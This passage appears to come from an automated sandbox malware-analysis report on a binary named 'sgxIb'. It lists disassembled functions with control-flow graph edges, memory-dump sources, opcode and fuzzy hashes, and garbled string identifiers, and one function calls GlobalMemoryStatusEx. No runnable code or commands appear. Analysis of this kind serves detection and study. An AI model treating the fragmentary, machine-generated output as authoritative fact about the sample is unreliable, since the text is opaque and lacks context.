                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: c5db02aa082fbed98cafb31c177c46bf6ebb8966aeec89b349aa9a2acd3ef785
                                                                                                            • Instruction ID: c141039e0f9740409e211f279ccc79c18528bb59db457abe5eb599a66ee25367
                                                                                                            • Opcode Fuzzy Hash: c5db02aa082fbed98cafb31c177c46bf6ebb8966aeec89b349aa9a2acd3ef785
                                                                                                            • Instruction Fuzzy Hash: AB916F30B0065A9FDF54DB68D9907AEB7F6AFC9204F108569C80DEB784EE709D42CB91
                                                                                                            Function 0685D070 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 322 685d070-685d08b 324 685d08d-685d090 322->324 325 685d092-685d0a1 324->325 326 685d0d9-685d0dc 324->326 329 685d0b0-685d0bc 325->329 330 685d0a3-685d0a8 325->330 327 685d125-685d128 326->327 328 685d0de-685d120 326->328 331 685d137-685d13a 327->331 332 685d12a-685d12c 327->332 328->327 333 685d0c2-685d0d4 329->333 334 685da8d-685dac6 329->334 330->329 337 685d144-685d147 331->337 338 685d13c-685d141 331->338 335 685d132 332->335 336 685d559 332->336 333->326 348 685dac8-685dacb 334->348 335->331 344 685d55c-685d568 336->344 341 685d190-685d193 337->341 342 685d149-685d18b 337->342 338->337 345 685d195-685d1d7 341->345 346 685d1dc-685d1df 341->346 342->341 344->325 349 685d56e-685d85b 344->349 345->346 351 685d1e1-685d223 346->351 352 685d228-685d22b 346->352 353 685dacd-685dae9 348->353 354 685daee-685daf1 348->354 536 685d861-685d867 349->536 537 685da82-685da8c 349->537 351->352 359 685d274-685d277 352->359 360 685d22d-685d26f 352->360 353->354 357 685db24-685db27 354->357 358 685daf3-685db1f 354->358 364 685db36-685db38 357->364 365 685db29 357->365 358->357 366 685d2c0-685d2c3 359->366 367 685d279-685d288 359->367 360->359 373 685db3f-685db42 364->373 374 685db3a 364->374 583 685db29 call 685dbe5 365->583 584 685db29 call 685dbf8 365->584 377 685d2c5-685d2c7 366->377 378 685d2d2-685d2d5 366->378 371 685d297-685d2a3 367->371 372 685d28a-685d28f 367->372 371->334 385 685d2a9-685d2bb 371->385 372->371 373->348 386 685db44-685db53 373->386 374->373 387 685d417-685d420 377->387 388 685d2cd 377->388 379 685d2d7-685d2ed 378->379 380 685d2f2-685d2f5 378->380 379->380 390 685d2f7-685d339 380->390 391 685d33e-685d341 380->391 384 685db2f-685db31 384->364 385->366 411 685db55-685dbb8 call 68566b8 386->411 412 685dbba-685dbcf 386->412 393 685d422-685d427 387->393 394 685d42f-685d43b 387->394 388->378 390->391 400 685d364-685d367 391->400 401 685d343-685d35f 391->401 393->394 402 685d441-685d455 394->402 403 685d54c-685d551 394->403 400->344 409 685d36d-685d370 400->409 401->400 402->336 428 685d45b-685d46d 402->428 403->336 419 685d372-685d3b4 409->419 420 685d3b9-685d3bc 409->420 411->412 434 685dbd0 412->434 419->420 423 685d405-685d407 420->423 424 685d3be-685d400 420->424 432 685d40e-685d411 423->432 433 685d409 423->433 424->423 444 685d491-685d493 428->444 445 685d46f-685d475 428->445 432->324 432->387 433->432 434->434 450 685d49d-685d4a9 444->450 451 685d477 445->451 452 685d479-685d485 445->452 463 685d4b7 450->463 464 685d4ab-685d4b5 450->464 454 685d487-685d48f 451->454 452->454 454->450 465 685d4bc-685d4be 463->465 464->465 465->336 470 685d4c4-685d4e0 call 68566b8 465->470 479 685d4e2-685d4e7 470->479 480 685d4ef-685d4fb 470->480 479->480 480->403 483 685d4fd-685d54a 480->483 483->336 538 685d876-685d87f 536->538 539 685d869-685d86e 536->539 538->334 540 685d885-685d898 538->540 539->538 542 685da72-685da7c 540->542 543 685d89e-685d8a4 540->543 542->536 542->537 544 685d8a6-685d8ab 543->544 545 685d8b3-685d8bc 543->545 544->545 545->334 546 685d8c2-685d8e3 545->546 549 685d8e5-685d8ea 546->549 550 685d8f2-685d8fb 546->550 549->550 550->334 551 685d901-685d91e 550->551 551->542 554 685d924-685d92a 551->554 554->334 555 685d930-685d949 554->555 557 685da65-685da6c 555->557 558 685d94f-685d976 555->558 557->542 557->554 558->334 561 685d97c-685d986 558->561 561->334 562 685d98c-685d9a3 561->562 564 685d9a5-685d9b0 562->564 565 685d9b2-685d9cd 562->565 564->565 565->557 570 685d9d3-685d9ec call 68566b8 565->570 574 685d9ee-685d9f3 570->574 575 685d9fb-685da04 570->575 574->575 575->334 576 685da0a-685da5e 575->576 576->557 583->384 584->384
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 6e8563d6bf05a20818649023d33e76dedbf116541d895e9b67f51a137dab96dd
                                                                                                            • Instruction ID: 52fb27796782360a83542de7dbbff9c6178cbe427cc9d1f49fff75907dd74693
                                                                                                            • Opcode Fuzzy Hash: 6e8563d6bf05a20818649023d33e76dedbf116541d895e9b67f51a137dab96dd
                                                                                                            • Instruction Fuzzy Hash: 4F625D34A003158FCB15EB68D580A5EB7F2FF84309B218A29D809DF759DB71ED86CB94
                                                                                                            Function 06854C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 585 6854c80-6854ca4 586 6854ca6-6854ca9 585->586 587 6854cab-6854cc5 586->587 588 6854cca-6854ccd 586->588 587->588 589 6854cd3-6854dcb 588->589 590 68553ac-68553ae 588->590 608 6854dd1-6854e19 589->608 609 6854e4e-6854e55 589->609 591 68553b5-68553b8 590->591 592 68553b0 590->592 591->586 594 68553be-68553cb 591->594 592->591 630 6854e1e call 6855529 608->630 631 6854e1e call 6855538 608->631 610 6854ed9-6854ee2 609->610 611 6854e5b-6854ecb 609->611 610->594 628 6854ed6 611->628 629 6854ecd 611->629 622 6854e24-6854e40 625 6854e42 622->625 626 6854e4b 622->626 625->626 626->609 628->610 629->628 630->622 631->622
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: c5b5518493b56b7e0352304bdd387ada919d4510a55a2c69549aa7fee63e6ed2
                                                                                                            • Instruction ID: 1f894b77de5393f5e26bc06b68ffee84bd92ccf955eaa98ea0a97b0f3ca214a4
                                                                                                            • Opcode Fuzzy Hash: c5b5518493b56b7e0352304bdd387ada919d4510a55a2c69549aa7fee63e6ed2
                                                                                                            • Instruction Fuzzy Hash: 80618030F002189FEB559FA9C8557AEBBF2FB88314F208429E509EB391DF758D458B61
                                                                                                            Function 068408CB Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1410 68408cb-68408ce 1411 68408d6-68408f7 1410->1411 1412 68408d0-68408d5 1410->1412 1413 6840ab2-6840ad6 1411->1413 1414 68408fd-6840906 1411->1414 1412->1411 1419 6840add-6840b78 call 6840550 1413->1419 1418 684090c-6840961 1414->1418 1414->1419 1427 6840963-6840988 1418->1427 1428 684098b-6840994 1418->1428 1462 6840b7d-6840b82 1419->1462 1427->1428 1430 6840996 1428->1430 1431 6840999-68409a9 1428->1431 1430->1431 1467 68409ab call 6840ab8 1431->1467 1468 68409ab call 6840b28 1431->1468 1469 68409ab call 68408cb 1431->1469 1434 68409b1-68409b3 1437 68409b5-68409ba 1434->1437 1438 6840a0d-6840a5a 1434->1438 1439 68409f3-6840a06 1437->1439 1440 68409bc-68409f1 1437->1440 1449 6840a61-6840a66 1438->1449 1439->1438 1440->1449 1452 6840a70-6840a75 1449->1452 1453 6840a68 1449->1453 1455 6840a77 1452->1455 1456 6840a7f-6840a84 1452->1456 1453->1452 1455->1456 1458 6840a86-6840a91 1456->1458 1459 6840a99 1456->1459 1458->1459 1459->1413 1467->1434 1468->1434 1469->1434
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (&^q$(bq
                                                                                                            • API String ID: 0-1294341849
                                                                                                            • Opcode ID: b6e675baea6942a1a29b132cd7f53cca760b5a1419464ccedb81177f7758acf3
                                                                                                            • Instruction ID: d08a6f2d825cc6aedc423a696dd40109fcd0204df9a7d5340c8736511ede6301
                                                                                                            • Opcode Fuzzy Hash: b6e675baea6942a1a29b132cd7f53cca760b5a1419464ccedb81177f7758acf3
                                                                                                            • Instruction Fuzzy Hash: 49717231F002199BDB55EFB8D8506AEBBB2AF84700F548529E505F7381DF34AD06CBA5
                                                                                                            Function 0685925B Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1470 685925b-685925d 1471 6859266 1470->1471 1472 6859260-6859262 1470->1472 1473 685926a-685928d 1471->1473 1472->1473 1474 6859264-6859265 1472->1474 1475 685928f-6859292 1473->1475 1474->1471 1476 6859294-68592b3 1475->1476 1477 68592b8-68592bb 1475->1477 1476->1477 1478 68592c1-68592d6 1477->1478 1479 6859b7b-6859b7d 1477->1479 1486 68592ee-6859304 1478->1486 1487 68592d8-68592de 1478->1487 1481 6859b84-6859b87 1479->1481 1482 6859b7f 1479->1482 1481->1475 1484 6859b8d-6859b97 1481->1484 1482->1481 1491 685930f-6859311 1486->1491 1488 68592e0 1487->1488 1489 68592e2-68592e4 1487->1489 1488->1486 1489->1486 1492 6859313-6859319 1491->1492 1493 6859329-685939a 1491->1493 1494 685931d-685931f 1492->1494 1495 685931b 1492->1495 1504 68593c6-68593e2 1493->1504 1505 685939c-68593bf 1493->1505 1494->1493 1495->1493 1510 68593e4-6859407 1504->1510 1511 685940e-6859429 1504->1511 1505->1504 1510->1511 1516 6859454-685946f 1511->1516 1517 685942b-685944d 1511->1517 1522 6859471-6859493 1516->1522 1523 685949a-68594a4 1516->1523 1517->1516 1522->1523 1524 68594b4-685952e 1523->1524 1525 68594a6-68594af 1523->1525 1531 6859530-685954e 1524->1531 1532 685957b-6859590 1524->1532 1525->1484 1536 6859550-685955f 1531->1536 1537 685956a-6859579 1531->1537 1532->1479 1536->1537 1537->1531 1537->1532
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 50c681b1ff06258bd08194ac57edc9b4e3e54bee822f656ec78e910a6d9e9423
                                                                                                            • Instruction ID: 514aafd13abd7e393848f0e060ccaaa025b87dd70ac02c92a742f06f3a997793
                                                                                                            • Opcode Fuzzy Hash: 50c681b1ff06258bd08194ac57edc9b4e3e54bee822f656ec78e910a6d9e9423
                                                                                                            • Instruction Fuzzy Hash: B9517230B006559FDF54DB68D9A1BAE77F6EBC9204F508429C809DB788EE70DC42CB95
                                                                                                            Function 06854C71 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1540 6854c71-6854c76 1541 6854c7e-6854ca4 1540->1541 1542 6854c78-6854c7c 1540->1542 1543 6854ca6-6854ca9 1541->1543 1542->1541 1544 6854cab-6854cc5 1543->1544 1545 6854cca-6854ccd 1543->1545 1544->1545 1546 6854cd3-6854dcb 1545->1546 1547 68553ac-68553ae 1545->1547 1565 6854dd1-6854e19 1546->1565 1566 6854e4e-6854e55 1546->1566 1548 68553b5-68553b8 1547->1548 1549 68553b0 1547->1549 1548->1543 1551 68553be-68553cb 1548->1551 1549->1548 1587 6854e1e call 6855529 1565->1587 1588 6854e1e call 6855538 1565->1588 1567 6854ed9-6854ee2 1566->1567 1568 6854e5b-6854ecb 1566->1568 1567->1551 1585 6854ed6 1568->1585 1586 6854ecd 1568->1586 1579 6854e24-6854e40 1582 6854e42 1579->1582 1583 6854e4b 1579->1583 1582->1583 1583->1566 1585->1567 1586->1585 1587->1579 1588->1579
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 4e0788872e2cd6589aecd5846cc8561ae8206b60e422bd74589da5fff668eb50
                                                                                                            • Instruction ID: 67d7ec37a909449d3207ae19bc0792ac655f6fafaf485c537e5a516070547185
                                                                                                            • Opcode Fuzzy Hash: 4e0788872e2cd6589aecd5846cc8561ae8206b60e422bd74589da5fff668eb50
                                                                                                            • Instruction Fuzzy Hash: 17517074F002189FDB459FB9C855BAEBBF6EF88700F20842AE505EB395DB758C018B65
                                                                                                            Function 0298EE3F Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2447 298ee3f-298eecc GlobalMemoryStatusEx 2450 298eece-298eed4 2447->2450 2451 298eed5-298eefd 2447->2451 2450->2451
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0298EEBF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1889257045.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2980000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: cc43a92ce1049c8ac2d7c539639452fb14846855bce9a36e6d32b94aea6be112
                                                                                                            • Instruction ID: c0ae3e5caacfbe808d9146f46b68b8a064deccdcc74e87ec6c98c0d3668430e9
                                                                                                            • Opcode Fuzzy Hash: cc43a92ce1049c8ac2d7c539639452fb14846855bce9a36e6d32b94aea6be112
                                                                                                            • Instruction Fuzzy Hash: 272136B1D006598FCB10DFA9C4446DEFBF4EF48320F15866AE468A7791D338A945CFA1
                                                                                                            Function 0298EE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2454 298ee58-298eecc GlobalMemoryStatusEx 2456 298eece-298eed4 2454->2456 2457 298eed5-298eefd 2454->2457 2456->2457
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0298EEBF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1889257045.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2980000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 1bd2521d1a5bd63a85fc8e551d96369c1b1674d3dfa3bf828bdd51e93ea2e9ea
                                                                                                            • Instruction ID: e024283740945ac0f457afba7c8cd52ab97ae53bac3b481d6e8b98cb64768af4
                                                                                                            • Opcode Fuzzy Hash: 1bd2521d1a5bd63a85fc8e551d96369c1b1674d3dfa3bf828bdd51e93ea2e9ea
                                                                                                            • Instruction Fuzzy Hash: DA11F0B2D006599BCB10DFAAC544BDEFBF4EF48320F15816AE818A7241D778A944CFA5
                                                                                                            Function 06840040 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2460 6840040-684004d 2461 68400af-68400fa 2460->2461 2462 684004f-6840053 2460->2462 2480 6840102 2461->2480 2481 68400fc-6840100 2461->2481 2463 6840055-684006d 2462->2463 2464 684006e-6840071 2462->2464 2466 6840073-6840085 2464->2466 2467 68400a9-68400ae 2464->2467 2471 6840087-684008a 2466->2471 2472 684008c 2466->2472 2475 684008e-68400a2 2471->2475 2472->2475 2475->2467 2482 6840104 2480->2482 2483 684010a-6840124 2480->2483 2481->2480 2482->2483 2484 6840126-6840129 2483->2484 2485 6840140-6840143 2484->2485 2486 684012b-6840139 2484->2486 2487 6840145-684014d 2485->2487 2488 684014e-6840151 2485->2488 2490 6840157-684019d 2486->2490 2492 684013b 2486->2492 2488->2490 2491 68402e8-68402eb 2488->2491 2508 68401a5-68401a7 2490->2508 2493 6840301-6840304 2491->2493 2494 68402ed-68402fc 2491->2494 2492->2485 2495 6840306-6840315 2493->2495 2496 684031a-684031c 2493->2496 2494->2493 2495->2496 2498 6840323-6840326 2496->2498 2499 684031e 2496->2499 2498->2484 2502 684032c-6840335 2498->2502 2499->2498 2509 684023c-6840260 2508->2509 2510 68401ad-68401b7 2508->2510 2518 6840262 2509->2518 2519 684026a-684026b 2509->2519 2514 68401cf-68401d5 2510->2514 2515 68401b9-68401bf 2510->2515 2516 68401d7-684020b 2514->2516 2517 684022c-6840236 2514->2517 2520 68401c1 2515->2520 2521 68401c3-68401c5 2515->2521 2516->2517 2517->2509 2517->2510 2518->2519 2519->2491 2520->2514 2521->2514
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 98178905ff28e1968abc1fb8272c6cd3d342642f7c6ddf9e594e1b5c9dfa4307
                                                                                                            • Instruction ID: b20a1f83cfae2fa1d719ea40a66a4d87c944aa57e5e5be1235e9227a2a7a5b80
                                                                                                            • Opcode Fuzzy Hash: 98178905ff28e1968abc1fb8272c6cd3d342642f7c6ddf9e594e1b5c9dfa4307
                                                                                                            • Instruction Fuzzy Hash: 3C51F431B042298FDB55ABB894503AF7BA6EBC4315F24482AD20ADB380DE75DC42C7E5
                                                                                                            Function 0684264E Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2593 684264e-6842652 2594 6842654-6842656 2593->2594 2595 684265a 2593->2595 2596 684265e 2594->2596 2597 6842658 2594->2597 2598 6842662-684267d 2595->2598 2599 684265c-684265d 2595->2599 2596->2598 2597->2595 2600 684267f-6842682 2598->2600 2599->2596 2601 68427de-68427e1 2600->2601 2602 6842688-68426ae 2600->2602 2603 6842804-6842806 2601->2603 2604 68427e3-68427ff 2601->2604 2613 68426b5-68426e3 2602->2613 2606 684280d-6842810 2603->2606 2607 6842808 2603->2607 2604->2603 2606->2600 2609 6842816-684281f 2606->2609 2607->2606 2618 68426e5-68426ef 2613->2618 2619 684275a-684277e 2613->2619 2623 6842707-6842758 2618->2623 2624 68426f1-68426f7 2618->2624 2625 6842780 2619->2625 2626 6842788 2619->2626 2623->2618 2623->2619 2627 68426f9 2624->2627 2628 68426fb-68426fd 2624->2628 2625->2626 2626->2601 2627->2623 2628->2623
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 4e140a7f36f299da6e87039bd53a0121cdfcf4d1d041d71c786c0b0ab3167966
                                                                                                            • Instruction ID: 768cfb9f7999d7573dc794ac9696c857fb4b0a6cfb5f921ed0af9c0e883a3591
                                                                                                            • Opcode Fuzzy Hash: 4e140a7f36f299da6e87039bd53a0121cdfcf4d1d041d71c786c0b0ab3167966
                                                                                                            • Instruction Fuzzy Hash: EA412730B082198FDB55BB38D5242AE77E2EB89314F204869E506DB345DF35DE46CBA1
                                                                                                            Function 0685DBE5 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: be81560006d07334133192f27b5fc7c2eee49f6cfffce2b9f7e23658ca52e9d6
                                                                                                            • Instruction ID: 33194f3a50389a91e1f1e63ff603e75f3e8b933fbd80764f2ad89fbea46c7935
                                                                                                            • Opcode Fuzzy Hash: be81560006d07334133192f27b5fc7c2eee49f6cfffce2b9f7e23658ca52e9d6
                                                                                                            • Instruction Fuzzy Hash: E041BD30E0030A9FDB61DFA8C8846AEBBB2BF85300F114929ED05EB340DB74A846CB55
                                                                                                            Function 0685DBF8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 3e3662594364b966386587022b4b991f2f86963a93e9d09d4cec76f3804a7de3
                                                                                                            • Instruction ID: 59867e2a4feb7bb14dfd52ca3740f4ff22731345699730dd3efed3065dee9793
                                                                                                            • Opcode Fuzzy Hash: 3e3662594364b966386587022b4b991f2f86963a93e9d09d4cec76f3804a7de3
                                                                                                            • Instruction Fuzzy Hash: DA419C70E0030ADFDB609FA5C88469EBBB2AF85301F214929ED05EB340DB74A946CB95
                                                                                                            Function 068521BD Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 52e999b2ec1fa0a11588996eb0c8be9ca1a3e231d7eb19166a1d3185cb0e178e
                                                                                                            • Instruction ID: c893d4e275a4249fdff615259674b528231a43586057d285649a844d3da14d59
                                                                                                            • Opcode Fuzzy Hash: 52e999b2ec1fa0a11588996eb0c8be9ca1a3e231d7eb19166a1d3185cb0e178e
                                                                                                            • Instruction Fuzzy Hash: F9310D30B003058FDB49AB74CA2476E7BE2AF89305F144828D906DB390DF39CE06CBA5
                                                                                                            Function 068521D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 4302e452afbbfe1e151d8ba0aa394261388756db8ad5803995292d7115767b47
                                                                                                            • Instruction ID: 89c5e26e9af8c42709cde509a943daab1c5ed3f3a3c45ae6a3984e348c53f94b
                                                                                                            • Opcode Fuzzy Hash: 4302e452afbbfe1e151d8ba0aa394261388756db8ad5803995292d7115767b47
                                                                                                            • Instruction Fuzzy Hash: F331DE30B102058FDB59AB78C92466F7BE3AB89304F204828D906DB394DF75DE46CBA5
                                                                                                            Function 068583E8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q
                                                                                                            • API String ID: 0-388095546
                                                                                                            • Opcode ID: 8664b487d5bc56b5b9e65c8c8759be310ce3402330ccb9cc4166a259539ec458
                                                                                                            • Instruction ID: 60f51d6d1cefce4857eff72a35d37ad9654daef4a959dc0d31af25c82df3e497
                                                                                                            • Opcode Fuzzy Hash: 8664b487d5bc56b5b9e65c8c8759be310ce3402330ccb9cc4166a259539ec458
                                                                                                            • Instruction Fuzzy Hash: A5F0FFB4B002348FDF749A48FA412BC37A9EB40208F02086BDE04CB655CB31DA06C7A0
                                                                                                            Function 06854B69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 04bc8de0bd4e917a964417b4154735a93eac1214e4045c6dbedae36678fa590c
                                                                                                            • Instruction ID: 62318a5fefc64e88ff3943cb5a32fb546501456ff08d6374523f1d04bf86c02f
                                                                                                            • Opcode Fuzzy Hash: 04bc8de0bd4e917a964417b4154735a93eac1214e4045c6dbedae36678fa590c
                                                                                                            • Instruction Fuzzy Hash: DCF0D430A20229DBDB14EF94E959BAEBBB2FF88704F204559E402A7294CBB41D45CB91
                                                                                                            Function 0685C2B0 Relevance: .6, Instructions: 641COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 22c0d19ad77199d7c63b18f1103bb6cc08c54a7e64cbc2e61685edc9081a714e
                                                                                                            • Instruction ID: 3340b503edf6d74f8535ff7568815d7002a5e41c64d3b5b67fbb91da0e91149e
                                                                                                            • Opcode Fuzzy Hash: 22c0d19ad77199d7c63b18f1103bb6cc08c54a7e64cbc2e61685edc9081a714e
                                                                                                            • Instruction Fuzzy Hash: 23328034A003198FDB54DB68D990AAEB7F2FB88314F118429E909EB755DB35EC42CF91
                                                                                                            Function 0685B3E7 Relevance: .6, Instructions: 557COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
